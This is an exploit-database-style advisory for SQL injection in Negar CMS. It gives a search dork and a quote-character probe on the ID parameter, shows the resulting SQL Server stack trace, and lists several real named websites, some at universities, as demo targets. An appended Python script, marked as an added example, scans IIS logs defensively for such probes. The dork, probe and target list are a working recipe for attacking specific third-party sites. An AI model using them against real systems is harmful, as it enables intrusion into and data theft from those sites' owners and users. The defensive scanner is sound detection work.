Negar CMS SQL INJECTION

2019.03.20
NikbinHK (IR)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Negar CMS SQL INJECTION
# Date: 2019-03-20
# Exploit Author: Nullix Security Team | NikbinHK | Mohammad Nikbin
# Vendor Homepage: http://www.negarcms.ir/
# Dork : intext:"Powered by NegarCMS"
# Version: Final Version
# Tested on: win,linux
=================================================================================
[SQL injection]
[+] Method ( Sql injection )
Nullix Security Team of IRan
[+] parameter : ID=
[-] To find the bug, place this in front of the site ['] or '

================= Output : =================
Conversion failed when converting the nvarchar value '3'' to data type int.

Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar value '3'' to data type int.

Source Error:
An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.

Stack Trace:
[SqlException (0x80131904): Conversion failed when converting the nvarchar value '3'' to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +2552942
   System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +5952492
   System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose) +285
   System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady) +4169
   System.Data.SqlClient.SqlDataReader.TryHasMoreRows(Boolean& moreRows) +240
   System.Data.SqlClient.SqlDataReader.TryReadInternal(Boolean setTimeout, Boolean& more) +268
   System.Data.SqlClient.SqlDataReader.Read() +34
   System.Data.Common.DataAdapter.FillLoadDataRow(SchemaMapping mapping) +211
   System.Data.Common.DataAdapter.FillFromReader(DataSet dataset, DataTable datatable, String srcTable, DataReaderContainer dataReader, Int32 startRecord, Int32 maxRecords, DataColumn parentChapterColumn, Object parentChapterValue) +197
   System.Data.Common.DataAdapter.Fill(DataTable[] dataTables, IDataReader dataReader, Int32 startRecord, Int32 maxRecords) +311
   System.Data.Common.DbDataAdapter.FillInternal(DataSet dataset, DataTable[] datatables, Int32 startRecord, Int32 maxRecords, String srcTable, IDbCommand command, CommandBehavior behavior) +170
   System.Data.Common.DbDataAdapter.Fill(DataTable[] dataTables, Int32 startRecord, Int32 maxRecords, IDbCommand command, CommandBehavior behavior) +160
   System.Data.Common.DbDataAdapter.Fill(DataTable dataTable) +108
   ExtendedModules_Subjects_UI_Category.Page_Load(Object sender, EventArgs e) +1694
   System.Web.UI.Control.OnLoad(EventArgs e) +95
   System.Web.UI.Control.LoadRecursive() +59
   System.Web.UI.Control.LoadRecursive() +131
   System.Web.UI.Control.LoadRecursive() +131
   System.Web.UI.Control.LoadRecursive() +131
   System.Web.UI.Control.LoadRecursive() +131
   System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +678
=================================================================================
Demo:
[+] http://www.iausk.ac.ir/Default.aspx?PageName=News&ID=[sql]
[-] http://www.iausk.ac.ir/Default.aspx?PageName=News&ID=241%27
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
[+] https://www.iranhoshdar.ir/Default.aspx?PageNAme=Page&ID=[SQL]
[-] https://www.iranhoshdar.ir/Default.aspx?PageNAme=Page&ID=%27
=================================================================================
htcd.tums.ac.ir/94/default.aspx?PageName=showcompany&Action=detail&ID=194
=================================================================================
www.imedss.ir/Default.aspx?PageName=forms&formid=5024
[Line 37: formid = Request.QueryString("FormID")]
=================================================================================
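
A defender-side check for the behaviour shown above, as an added example that is not part of the original advisory or the vendor's code: it scans IIS W3C logs for Default.aspx requests whose ID or formid value is not a plain integer. The log field layout, the sample lines and the client addresses are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl

# Query parameters the advisory shows being treated as integers (case-insensitive).
NUMERIC_PARAMS = {"id", "formid"}

# Constructed IIS W3C log sample; addresses are documentation-range values.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2019-03-20 10:01:02 GET /Default.aspx PageName=News&ID=241 192.0.2.10 200
2019-03-20 10:01:09 GET /Default.aspx PageName=News&ID=241%27 192.0.2.44 500
2019-03-20 10:02:30 GET /Default.aspx PageName=forms&formid=5024 192.0.2.10 200
2019-03-20 10:02:41 GET /default.aspx PageName=Page&ID=' 192.0.2.44 500
2019-03-20 10:03:00 GET /images/logo.png - 192.0.2.10 200
"""

def suspicious_requests(log_text):
    """Return (client_ip, param, decoded_value, status) for non-integer IDs."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names follow the directive
            continue
        if not line or line.startswith("#"):
            continue
        row = dict(zip(fields, line.split()))
        if not row.get("cs-uri-stem", "").lower().endswith("/default.aspx"):
            continue
        query = row.get("cs-uri-query", "-")
        if query == "-":
            continue
        # parse_qsl percent-decodes, so %27 and a literal quote look the same here.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name.lower() in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]{1,10}", value):
                hits.append((row["c-ip"], name, value, int(row["sc-status"])))
    return hits

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

Hits that also carry status 500 line up with the unhandled SqlException page in the output above and are the ones to triage first.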

